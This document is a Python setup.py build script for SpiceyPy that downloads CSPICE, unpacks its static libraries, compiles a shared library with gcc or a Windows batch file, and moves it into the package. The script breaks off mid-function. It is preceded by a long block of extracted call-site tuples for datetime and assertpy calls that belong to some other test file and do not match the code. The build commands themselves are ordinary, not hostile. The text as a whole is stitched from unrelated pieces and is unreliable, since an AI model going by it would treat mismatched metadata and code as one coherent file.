[((1613, 1638), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (1636, 1638), False, 'import datetime\n'), ((14298, 14328), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(60)'}), '(seconds=60)\n', (14316, 14328), False, 'import datetime\n'), ((1671, 1696), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (1694, 1696), False, 'import datetime\n'), ((2605, 2630), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (2628, 2630), False, 'import datetime\n'), ((6755, 6780), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (6778, 6780), False, 'import datetime\n'), ((8255, 8280), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (8278, 8280), False, 'import datetime\n'), ((9714, 9739), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (9737, 9739), False, 'import datetime\n'), ((9749, 9774), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (9772, 9774), False, 'import datetime\n'), ((12047, 12072), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (12070, 12072), False, 'import datetime\n'), ((14377, 14408), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(120)'}), '(seconds=120)\n', (14395, 14408), False, 'import datetime\n'), ((15891, 15921), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(90)'}), '(seconds=90)\n', (15909, 15921), False, 'import datetime\n'), ((17363, 17393), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(90)'}), '(seconds=90)\n', (17381, 17393), False, 'import datetime\n'), ((17403, 17434), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(120)'}), '(seconds=120)\n', (17421, 17434), False, 'import datetime\n'), ((17925, 17955), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(90)'}), '(seconds=90)\n', (17943, 17955), False, 'import datetime\n'), ((17965, 17996), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(120)'}), '(seconds=120)\n', (17983, 17996), False, 'import datetime\n'), ((1784, 1809), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (1807, 1809), False, 'import datetime\n'), ((1856, 1888), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (1860, 1888), False, 'from assertpy import assert_that, fail\n'), ((2176, 2208), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (2180, 2208), False, 'from assertpy import assert_that, fail\n'), ((2422, 2454), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (2426, 2454), False, 'from assertpy import assert_that, fail\n'), ((2716, 2741), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (2739, 2741), False, 'import datetime\n'), ((2787, 2819), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (2791, 2819), False, 'from assertpy import assert_that, fail\n'), ((3104, 3136), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (3108, 3136), False, 'from assertpy import assert_that, fail\n'), ((3348, 3380), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (3352, 3380), False, 'from assertpy import assert_that, fail\n'), ((3807, 3839), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should 
have raised error')\n", (3811, 3839), False, 'from assertpy import assert_that, fail\n'), ((4177, 4209), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (4181, 4209), False, 'from assertpy import assert_that, fail\n'), ((4471, 4503), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (4475, 4503), False, 'from assertpy import assert_that, fail\n'), ((4910, 4942), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (4914, 4942), False, 'from assertpy import assert_that, fail\n'), ((5258, 5290), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (5262, 5290), False, 'from assertpy import assert_that, fail\n'), ((5542, 5574), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (5546, 5574), False, 'from assertpy import assert_that, fail\n'), ((5969, 6001), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (5973, 6001), False, 'from assertpy import assert_that, fail\n'), ((6287, 6319), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (6291, 6319), False, 'from assertpy import assert_that, fail\n'), ((6565, 6597), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (6569, 6597), False, 'from assertpy import assert_that, fail\n'), ((6880, 6905), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (6903, 6905), False, 'import datetime\n'), ((6958, 6990), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (6962, 6990), False, 'from assertpy import assert_that, fail\n'), ((7295, 7327), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (7299, 7327), False, 'from assertpy import assert_that, fail\n'), ((7608, 7633), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (7631, 7633), False, 'import datetime\n'), ((7698, 7730), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (7702, 7730), False, 'from assertpy import assert_that, fail\n'), ((8071, 8103), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (8075, 8103), False, 'from assertpy import assert_that, fail\n'), ((8374, 8399), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (8397, 8399), False, 'import datetime\n'), ((8449, 8481), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (8453, 8481), False, 'from assertpy import assert_that, fail\n'), ((8777, 8809), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (8781, 8809), False, 'from assertpy import assert_that, fail\n'), ((9081, 9106), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (9104, 9106), False, 'import datetime\n'), ((9168, 9200), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (9172, 9200), False, 'from assertpy import assert_that, fail\n'), ((9532, 9564), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (9536, 9564), False, 'from assertpy import assert_that, fail\n'), ((9868, 9893), 
'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (9891, 9893), False, 'import datetime\n'), ((9907, 9932), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (9930, 9932), False, 'import datetime\n'), ((9984, 10016), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (9988, 10016), False, 'from assertpy import assert_that, fail\n'), ((10354, 10386), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (10358, 10386), False, 'from assertpy import assert_that, fail\n'), ((10575, 10600), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (10598, 10600), False, 'import datetime\n'), ((10653, 10685), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (10657, 10685), False, 'from assertpy import assert_that, fail\n'), ((10854, 10883), 'datetime.timedelta', 'datetime.timedelta', ([], {'minutes': '(5)'}), '(minutes=5)\n', (10872, 10883), False, 'import datetime\n'), ((10898, 10928), 'datetime.timedelta', 'datetime.timedelta', ([], {'minutes': '(10)'}), '(minutes=10)\n', (10916, 10928), False, 'import datetime\n'), ((11169, 11201), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (11173, 11201), False, 'from assertpy import assert_that, fail\n'), ((11547, 11579), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (11551, 11579), False, 'from assertpy import assert_that, fail\n'), ((11772, 11797), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (11795, 11797), False, 'import datetime\n'), ((11854, 11886), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (11858, 11886), False, 'from assertpy import assert_that, fail\n'), ((12109, 12138), 'datetime.timedelta', 'datetime.timedelta', ([], {'minutes': '(5)'}), '(minutes=5)\n', (12127, 12138), False, 'import datetime\n'), ((12309, 12341), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (12313, 12341), False, 'from assertpy import assert_that, fail\n'), ((12674, 12706), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (12678, 12706), False, 'from assertpy import assert_that, fail\n'), ((12899, 12924), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (12922, 12924), False, 'import datetime\n'), ((12978, 13010), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (12982, 13010), False, 'from assertpy import assert_that, fail\n'), ((13179, 13208), 'datetime.timedelta', 'datetime.timedelta', ([], {'minutes': '(5)'}), '(minutes=5)\n', (13197, 13208), False, 'import datetime\n'), ((13249, 13278), 'datetime.timedelta', 'datetime.timedelta', ([], {'minutes': '(4)'}), '(minutes=4)\n', (13267, 13278), False, 'import datetime\n'), ((13339, 13364), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (13362, 13364), False, 'import datetime\n'), ((13448, 13480), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (13452, 13480), False, 'from assertpy import assert_that, fail\n'), ((13821, 13853), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (13825, 13853), False, 'from assertpy import 
assert_that, fail\n'), ((14050, 14075), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (14073, 14075), False, 'import datetime\n'), ((14133, 14165), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (14137, 14165), False, 'from assertpy import assert_that, fail\n'), ((14518, 14548), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(90)'}), '(seconds=90)\n', (14536, 14548), False, 'import datetime\n'), ((14601, 14633), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (14605, 14633), False, 'from assertpy import assert_that, fail\n'), ((14916, 14948), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (14920, 14948), False, 'from assertpy import assert_that, fail\n'), ((15250, 15280), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(90)'}), '(seconds=90)\n', (15268, 15280), False, 'import datetime\n'), ((15345, 15377), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (15349, 15377), False, 'from assertpy import assert_that, fail\n'), ((15696, 15728), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (15700, 15728), False, 'from assertpy import assert_that, fail\n'), ((16025, 16055), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(90)'}), '(seconds=90)\n', (16043, 16055), False, 'import datetime\n'), ((16105, 16137), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (16109, 16137), False, 'from assertpy import assert_that, fail\n'), ((16411, 16443), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (16415, 16443), False, 'from assertpy import assert_that, fail\n'), ((16736, 16766), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(90)'}), '(seconds=90)\n', (16754, 16766), False, 'import datetime\n'), ((16828, 16860), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (16832, 16860), False, 'from assertpy import assert_that, fail\n'), ((17170, 17202), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (17174, 17202), False, 'from assertpy import assert_that, fail\n'), ((17538, 17568), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(30)'}), '(seconds=30)\n', (17556, 17568), False, 'import datetime\n'), ((17582, 17612), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(40)'}), '(seconds=40)\n', (17600, 17612), False, 'import datetime\n'), ((17664, 17696), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (17668, 17696), False, 'from assertpy import assert_that, fail\n'), ((18108, 18138), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(90)'}), '(seconds=90)\n', (18126, 18138), False, 'import datetime\n'), ((18152, 18183), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(120)'}), '(seconds=120)\n', (18170, 18183), False, 'import datetime\n'), ((18239, 18271), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (18243, 18271), False, 'from assertpy import assert_that, fail\n'), ((1701, 1716), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (1712, 1716), False, 'from assertpy import assert_that, 
fail\n'), ((2635, 2650), 'assertpy.assert_that', 'assert_that', (['d2'], {}), '(d2)\n', (2646, 2650), False, 'from assertpy import assert_that, fail\n'), ((3551, 3566), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (3562, 3566), False, 'from assertpy import assert_that, fail\n'), ((3682, 3707), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (3705, 3707), False, 'import datetime\n'), ((3710, 3736), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(1)'}), '(days=1)\n', (3728, 3736), False, 'import datetime\n'), ((4669, 4684), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (4680, 4684), False, 'from assertpy import assert_that, fail\n'), ((4790, 4815), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (4813, 4815), False, 'import datetime\n'), ((4818, 4844), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(1)'}), '(days=1)\n', (4836, 4844), False, 'import datetime\n'), ((5737, 5752), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (5748, 5752), False, 'from assertpy import assert_that, fail\n'), ((5852, 5877), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (5875, 5877), False, 'import datetime\n'), ((5880, 5906), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(1)'}), '(days=1)\n', (5898, 5906), False, 'import datetime\n'), ((6785, 6800), 'assertpy.assert_that', 'assert_that', (['d2'], {}), '(d2)\n', (6796, 6800), False, 'from assertpy import assert_that, fail\n'), ((7489, 7504), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (7500, 7504), False, 'from assertpy import assert_that, fail\n'), ((8285, 8300), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (8296, 8300), False, 'from assertpy import assert_that, fail\n'), ((8968, 8983), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (8979, 8983), False, 'from assertpy import assert_that, fail\n'), ((9779, 9794), 'assertpy.assert_that', 'assert_that', (['d2'], {}), '(d2)\n', (9790, 9794), False, 'from assertpy import assert_that, fail\n'), ((10933, 10948), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (10944, 10948), False, 'from assertpy import assert_that, fail\n'), ((11035, 11064), 'datetime.timedelta', 'datetime.timedelta', ([], {'minutes': '(5)'}), '(minutes=5)\n', (11053, 11064), False, 'import datetime\n'), ((11083, 11113), 'datetime.timedelta', 'datetime.timedelta', ([], {'minutes': '(10)'}), '(minutes=10)\n', (11101, 11113), False, 'import datetime\n'), ((12077, 12092), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (12088, 12092), False, 'from assertpy import assert_that, fail\n'), ((12200, 12229), 'datetime.timedelta', 'datetime.timedelta', ([], {'minutes': '(5)'}), '(minutes=5)\n', (12218, 12229), False, 'import datetime\n'), ((12270, 12299), 'datetime.timedelta', 'datetime.timedelta', ([], {'minutes': '(1)'}), '(minutes=1)\n', (12288, 12299), False, 'import datetime\n'), ((13213, 13228), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (13224, 13228), False, 'from assertpy import assert_that, fail\n'), ((13409, 13438), 'datetime.timedelta', 'datetime.timedelta', ([], {'minutes': '(5)'}), '(minutes=5)\n', (13427, 13438), False, 'import datetime\n'), ((14413, 14428), 'assertpy.assert_that', 'assert_that', (['d2'], {}), '(d2)\n', (14424, 14428), False, 'from assertpy import assert_that, fail\n'), ((15121, 15136), 'assertpy.assert_that', 'assert_that', (['t1'], {}), '(t1)\n', (15132, 15136), False, 
'from assertpy import assert_that, fail\n'), ((15926, 15941), 'assertpy.assert_that', 'assert_that', (['t1'], {}), '(t1)\n', (15937, 15941), False, 'from assertpy import assert_that, fail\n'), ((16613, 16628), 'assertpy.assert_that', 'assert_that', (['t1'], {}), '(t1)\n', (16624, 16628), False, 'from assertpy import assert_that, fail\n'), ((17439, 17454), 'assertpy.assert_that', 'assert_that', (['d2'], {}), '(d2)\n', (17450, 17454), False, 'from assertpy import assert_that, fail\n'), ((18001, 18016), 'assertpy.assert_that', 'assert_that', (['t1'], {}), '(t1)\n', (18012, 18016), False, 'from assertpy import assert_that, fail\n'), ((1818, 1833), 'assertpy.assert_that', 'assert_that', (['d2'], {}), '(d2)\n', (1829, 1833), False, 'from assertpy import assert_that, fail\n'), ((2136, 2152), 'assertpy.assert_that', 'assert_that', (['(123)'], {}), '(123)\n', (2147, 2152), False, 'from assertpy import assert_that, fail\n'), ((2383, 2398), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (2394, 2398), False, 'from assertpy import assert_that, fail\n'), ((2750, 2765), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (2761, 2765), False, 'from assertpy import assert_that, fail\n'), ((3065, 3081), 'assertpy.assert_that', 'assert_that', (['(123)'], {}), '(123)\n', (3076, 3081), False, 'from assertpy import assert_that, fail\n'), ((3310, 3325), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (3321, 3325), False, 'from assertpy import assert_that, fail\n'), ((3745, 3760), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (3756, 3760), False, 'from assertpy import assert_that, fail\n'), ((4113, 4129), 'assertpy.assert_that', 'assert_that', (['(123)'], {}), '(123)\n', (4124, 4129), False, 'from assertpy import assert_that, fail\n'), ((4408, 4423), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (4419, 4423), False, 'from assertpy import assert_that, fail\n'), ((4853, 4868), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (4864, 4868), False, 'from assertpy import assert_that, fail\n'), ((5199, 5215), 'assertpy.assert_that', 'assert_that', (['(123)'], {}), '(123)\n', (5210, 5215), False, 'from assertpy import assert_that, fail\n'), ((5484, 5499), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (5495, 5499), False, 'from assertpy import assert_that, fail\n'), ((5915, 5930), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (5926, 5930), False, 'from assertpy import assert_that, fail\n'), ((6231, 6247), 'assertpy.assert_that', 'assert_that', (['(123)'], {}), '(123)\n', (6242, 6247), False, 'from assertpy import assert_that, fail\n'), ((6510, 6525), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (6521, 6525), False, 'from assertpy import assert_that, fail\n'), ((6914, 6929), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (6925, 6929), False, 'from assertpy import assert_that, fail\n'), ((7250, 7265), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (7261, 7265), False, 'from assertpy import assert_that, fail\n'), ((7642, 7657), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (7653, 7657), False, 'from assertpy import assert_that, fail\n'), ((8014, 8029), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (8025, 8029), False, 'from assertpy import assert_that, fail\n'), ((8408, 8423), 'assertpy.assert_that', 'assert_that', (['d2'], {}), '(d2)\n', (8419, 8423), False, 'from assertpy import assert_that, fail\n'), ((8735, 8750), 
'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (8746, 8750), False, 'from assertpy import assert_that, fail\n'), ((9115, 9130), 'assertpy.assert_that', 'assert_that', (['d2'], {}), '(d2)\n', (9126, 9130), False, 'from assertpy import assert_that, fail\n'), ((9478, 9493), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (9489, 9493), False, 'from assertpy import assert_that, fail\n'), ((9941, 9956), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (9952, 9956), False, 'from assertpy import assert_that, fail\n'), ((10309, 10324), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (10320, 10324), False, 'from assertpy import assert_that, fail\n'), ((10609, 10624), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (10620, 10624), False, 'from assertpy import assert_that, fail\n'), ((11122, 11137), 'assertpy.assert_that', 'assert_that', (['d2'], {}), '(d2)\n', (11133, 11137), False, 'from assertpy import assert_that, fail\n'), ((11498, 11513), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (11509, 11513), False, 'from assertpy import assert_that, fail\n'), ((11806, 11821), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (11817, 11821), False, 'from assertpy import assert_that, fail\n'), ((12238, 12253), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (12249, 12253), False, 'from assertpy import assert_that, fail\n'), ((12628, 12643), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (12639, 12643), False, 'from assertpy import assert_that, fail\n'), ((12933, 12948), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (12944, 12948), False, 'from assertpy import assert_that, fail\n'), ((13373, 13388), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (13384, 13388), False, 'from assertpy import assert_that, fail\n'), ((13771, 13786), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (13782, 13786), False, 'from assertpy import assert_that, fail\n'), ((14084, 14099), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (14095, 14099), False, 'from assertpy import assert_that, fail\n'), ((14557, 14572), 'assertpy.assert_that', 'assert_that', (['t1'], {}), '(t1)\n', (14568, 14572), False, 'from assertpy import assert_that, fail\n'), ((14871, 14886), 'assertpy.assert_that', 'assert_that', (['t1'], {}), '(t1)\n', (14882, 14886), False, 'from assertpy import assert_that, fail\n'), ((15289, 15304), 'assertpy.assert_that', 'assert_that', (['t1'], {}), '(t1)\n', (15300, 15304), False, 'from assertpy import assert_that, fail\n'), ((15639, 15654), 'assertpy.assert_that', 'assert_that', (['t1'], {}), '(t1)\n', (15650, 15654), False, 'from assertpy import assert_that, fail\n'), ((16064, 16079), 'assertpy.assert_that', 'assert_that', (['t2'], {}), '(t2)\n', (16075, 16079), False, 'from assertpy import assert_that, fail\n'), ((16369, 16384), 'assertpy.assert_that', 'assert_that', (['t1'], {}), '(t1)\n', (16380, 16384), False, 'from assertpy import assert_that, fail\n'), ((16775, 16790), 'assertpy.assert_that', 'assert_that', (['t2'], {}), '(t2)\n', (16786, 16790), False, 'from assertpy import assert_that, fail\n'), ((17116, 17131), 'assertpy.assert_that', 'assert_that', (['t1'], {}), '(t1)\n', (17127, 17131), False, 'from assertpy import assert_that, fail\n'), ((17621, 17636), 'assertpy.assert_that', 'assert_that', (['t1'], {}), '(t1)\n', (17632, 17636), False, 'from assertpy import assert_that, fail\n'), ((18192, 18207), 
'assertpy.assert_that', 'assert_that', (['d2'], {}), '(d2)\n', (18203, 18207), False, 'from assertpy import assert_that, fail\n')]
|
"""
The MIT License (MIT)
Copyright (c) [2015-2019] [<NAME>]
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from setuptools import setup, Command
from setuptools.command.install import install
from setuptools.command.build_py import build_py
from setuptools.command.test import test as TestCommand
from setuptools.dist import Distribution
import ssl
import sys
import os
import subprocess
import platform
import shutil
__author__ = 'AndrewAnnex'
# Get OS platform
host_OS = platform.system()
# Determine whether the platform is a Unix-like OS
is_unix = host_OS in ("Linux", "Darwin", "FreeBSD")
# Get the directory containing this setup script
root_dir = os.path.dirname(os.path.realpath(__file__))
# Make the directory path for cspice
cspice_dir = os.path.join(root_dir, 'cspice')
# Make the directory path for cspice/lib
lib_dir = os.path.join(cspice_dir, 'lib')
TEST_DEPENDENCIES = ['setuptools>=38.0.0', 'numpy<=1.16.4;python_version<"3.5"', 'numpy>=1.17.0;python_version>="3.5"', 'six>=1.9.0', 'pytest>=2.9.0']
DEPENDENCIES = ['setuptools>=38.0.0', 'numpy<=1.16.4;python_version<"3.5"', 'numpy>=1.17.0;python_version>="3.5"', 'six>=1.9.0', 'certifi>=2017.1.23']
REQUIRES = ['numpy', 'six']
# If we have an old version of OpenSSL, CSPICE will be downloaded
# (if required) using urllib3. Extend the list of required packages.
if ssl.OPENSSL_VERSION < 'OpenSSL 1.0.1g':
DEPENDENCIES.extend(['urllib3[secure]>=1.22', 'pyOpenSSL>=17.3.0'])
class InstallCSpice(object):
@staticmethod
def get_cspice():
if InstallCSpice.check_for_spice():
print("Host OS: {0}".format(host_OS))
if is_unix:
InstallCSpice.unix_method()
elif host_OS == "Windows":
InstallCSpice.windows_method()
else:
sys.exit("Unsupported OS: {0}".format(host_OS))
@staticmethod
def check_for_spice():
print('Checking the path', cspice_dir)
if not os.path.exists(cspice_dir):
import getspice
message = 'Unable to find CSPICE at {0}. Attempting to Download CSPICE For you:'.format(cspice_dir)
print(message)
# Download cspice using getspice.py
getspice.GetCSPICE(version='N0066')
if not os.path.exists(cspice_dir):
message = 'Unable to find CSPICE at {0}. Exiting'.format(cspice_dir)
sys.exit(message)
return True
return False
@staticmethod
def unpack_cspice():
if is_unix:
            cspice_lib = os.path.join(lib_dir, ("cspice.lib" if host_OS == "Windows" else "cspice.a"))
            csupport_lib = os.path.join(lib_dir, ("csupport.lib" if host_OS == "Windows" else "csupport.a"))
if os.path.exists(cspice_lib) and os.path.exists(csupport_lib):
cwd = os.getcwd()
try:
os.chdir(lib_dir)
                    if host_OS == "Windows":
raise BaseException("Windows is not supported in this build method")
elif is_unix:
for lib in ["ar -x cspice.a", "ar -x csupport.a"]:
unpack_lib_process = subprocess.Popen(lib, shell=True)
process_status = os.waitpid(unpack_lib_process.pid, 0)[1]
if process_status != 0:
raise BaseException('{0}'.format(process_status))
else:
raise BaseException("Unsupported OS: {0}".format(host_OS))
except BaseException as error:
status = error.args
sys.exit('Error: cspice object file extraction failed with exit status: {0}'.format(status))
finally:
os.chdir(cwd)
else:
error_Message = "Error, cannot find CSPICE " \
"static libraries at {0}".format(lib_dir)
sys.exit(error_Message)
@staticmethod
def build_library():
# Get the current working directory
cwd = os.getcwd()
if is_unix:
try:
os.chdir(lib_dir)
# find a way to make this work via Extension and setuptools, not using popen.
build_lib = subprocess.Popen('gcc -shared -fPIC -lm *.o -o spice.so', shell=True)
status = os.waitpid(build_lib.pid, 0)[1]
if status != 0:
raise BaseException('{0}'.format(status))
success = os.path.exists(os.path.join(os.getcwd(), 'spice.so'))
if not success:
raise BaseException("Did not find spice.so, build went badly.")
except BaseException as errorInst:
status = errorInst.args
sys.exit('Error: compilation of shared spice.so build exit status: {0}'.format(status))
elif host_OS == "Windows":
try:
destination = os.path.join(cspice_dir, "src", "cspice")
defFile = os.path.join(root_dir, "appveyor", "cspice.def")
makeBat = os.path.join(root_dir, "appveyor", "makeDynamicSpice.bat")
shutil.copy(defFile, destination)
shutil.copy(makeBat, destination)
# run the script
os.chdir(destination)
windows_build = subprocess.Popen("makeDynamicSpice.bat", shell=True)
status = windows_build.wait()
if status != 0:
raise BaseException('{0}'.format(status))
except BaseException as error:
sys.exit("Build failed with: {0}".format(error.args))
        # Change back to the stored current working directory
os.chdir(cwd)
@staticmethod
def move_to_root_directory():
sharedlib = 'spice.so' if is_unix else 'cspice.dll'
destination = os.path.join(root_dir, 'spiceypy', 'utils', sharedlib)
if not os.path.isfile(destination):
if is_unix:
target = os.path.join(cspice_dir, 'lib', sharedlib)
else:
target = os.path.join(cspice_dir, 'src', 'cspice', sharedlib)
print("Attempting to move: {0} to: {1}".format(target, destination))
try:
os.rename(target, destination)
except BaseException as e:
                sys.exit('{0} file not found, what happened?: {1}'.format(sharedlib, e))
@staticmethod
def cleanup():
# Remove CSPICE folder
try:
shutil.rmtree(os.path.join(os.getcwd(), "cspice"))
except OSError as e:
print("Error Cleaning up cspice folder")
raise e
@staticmethod
def unix_method():
# Unpack cspice.a and csupport.a
